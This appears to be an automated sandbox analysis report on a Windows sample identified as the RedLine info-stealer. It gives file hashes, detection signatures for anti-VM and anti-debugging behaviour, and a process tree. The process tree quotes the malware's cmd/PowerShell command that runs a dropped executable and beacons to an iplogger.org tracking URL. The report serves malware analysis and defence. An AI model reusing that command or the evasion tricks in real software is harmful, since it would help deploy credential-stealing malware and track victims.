Analysis
-
max time kernel
131s -
max time network
154s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
15-02-2022 13:42
Static task
static1
Behavioral task
behavioral1
Sample
49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe
Resource
win10v2004-en-20220113
General
-
Target
49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe
-
Size
2.6MB
-
MD5
8fbf01af64c7bb1289a26b1f7574ae9e
-
SHA1
bcb617c6977334e789f9eace561f1c931024b32c
-
SHA256
49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec
-
SHA512
0cdac73d08652435e48ea05dd73cc414a212c40dcc62b96c637a2a2cd35e24aafecdc99f1c9f023089bf16c6a9dc3b87dae5d38ffa58878820ec32c1cd1fbe62
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/592-69-0x0000000000250000-0x0000000000950000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Executes dropped EXE 1 IoCs
Processes:
Ww.exepid process 592 Ww.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Ww.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Ww.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Ww.exe -
Loads dropped DLL 2 IoCs
Processes:
49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.execmd.exepid process 832 49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe 892 cmd.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Ww.exe themida C:\Users\Admin\AppData\Local\Temp\Ww.exe themida C:\Users\Admin\AppData\Local\Temp\Ww.exe themida behavioral1/memory/592-69-0x0000000000250000-0x0000000000950000-memory.dmp themida -
Processes:
Ww.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ww.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Ww.exepid process 592 Ww.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
Ww.exepowershell.exepid process 592 Ww.exe 1900 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1900 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.execmd.exedescription pid process target process PID 832 wrote to memory of 892 832 49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe cmd.exe PID 832 wrote to memory of 892 832 49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe cmd.exe PID 832 wrote to memory of 892 832 49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe cmd.exe PID 832 wrote to memory of 892 832 49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe cmd.exe PID 892 wrote to memory of 592 892 cmd.exe Ww.exe PID 892 wrote to memory of 592 892 cmd.exe Ww.exe PID 892 wrote to memory of 592 892 cmd.exe Ww.exe PID 892 wrote to memory of 592 892 cmd.exe Ww.exe PID 892 wrote to memory of 1900 892 cmd.exe powershell.exe PID 892 wrote to memory of 1900 892 cmd.exe powershell.exe PID 892 wrote to memory of 1900 892 cmd.exe powershell.exe PID 892 wrote to memory of 1900 892 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe"C:\Users\Admin\AppData\Local\Temp\49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "Ww.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Users\Admin\AppData\Local\Temp\Ww.exe"Ww.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
55232b7cee343da1464106a4ef76e98f
SHA1f2b672a29b86400d87f1f6dcde6341051770cd55
SHA25696a2adaa6de0944e24be94cbf2c89e35babbea9e2cb00ddcdb560d9f33a362fc
SHA5120c4bc94b9fc05cf59661a950520e9cef0a9e37c3307783cbc490d834a09852632467583b59fe836dce47b17e51407d1aa66b1b70ea8a0da3f5bf8e3a8ab13f8c
-
MD5
55232b7cee343da1464106a4ef76e98f
SHA1f2b672a29b86400d87f1f6dcde6341051770cd55
SHA25696a2adaa6de0944e24be94cbf2c89e35babbea9e2cb00ddcdb560d9f33a362fc
SHA5120c4bc94b9fc05cf59661a950520e9cef0a9e37c3307783cbc490d834a09852632467583b59fe836dce47b17e51407d1aa66b1b70ea8a0da3f5bf8e3a8ab13f8c
-
MD5
55232b7cee343da1464106a4ef76e98f
SHA1f2b672a29b86400d87f1f6dcde6341051770cd55
SHA25696a2adaa6de0944e24be94cbf2c89e35babbea9e2cb00ddcdb560d9f33a362fc
SHA5120c4bc94b9fc05cf59661a950520e9cef0a9e37c3307783cbc490d834a09852632467583b59fe836dce47b17e51407d1aa66b1b70ea8a0da3f5bf8e3a8ab13f8c
-
MD5
293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19